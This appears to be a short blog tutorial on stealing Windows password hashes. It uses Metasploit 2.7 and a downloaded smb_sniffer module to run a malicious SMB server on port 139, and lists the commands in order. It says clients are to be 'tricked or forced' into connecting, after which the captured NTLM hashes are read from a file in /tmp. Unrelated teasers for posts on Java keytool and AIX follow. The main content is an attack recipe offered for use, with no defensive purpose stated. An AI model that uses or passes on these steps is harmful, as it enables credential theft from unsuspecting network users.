> Requirements:
1.) Metasploit 2.7 on a Unix-based machine
2.) http://grutz.jingojango.net/exploits/smb_sniffer.pm
-> What we'r going to do:
So the basic idea of stealing passwords using Metasploit is to bind our malicious SMB Server to
port 139 and listen for incomming connections.For every request, the client uses the NTML Protocol to authenticate.
We will use the smb_sniffer, but it wont work without placing it in the Metasploit exploits/ directory.
-> Let's get it on:
So lets begin.
1.)Start Metasploit with root privleges -> sudo msfconsole
2.)Select the smb_sniffer -> use smb_sniffer
3.)Set the pw-File -> set PWFILE /tmp/password_file.txt
4.)Start out malicious SMB Service -> exploit
5.)So if there is an incoming request (either because we tricked or forced the client to do so)
it should look like this: "[*] New connection from -ip-"
6.)Look into the /tmp/password_file.txt file and voilĂ - there are the hashes.
How to Change JKS KeyStore Private Key Password
Use following keytool command to change the key store password >keytool -storepasswd -new [new password ] -keystore [path to key stor...
-
AIX Environment Procedures The best way to approach this portion of the checklist is to do a comprehensive physical inventory of the server...
-
Java Keytool Commands for Creating and Importing keystore files: These commands allow you to generate a new Java Keytool keystore file, crea...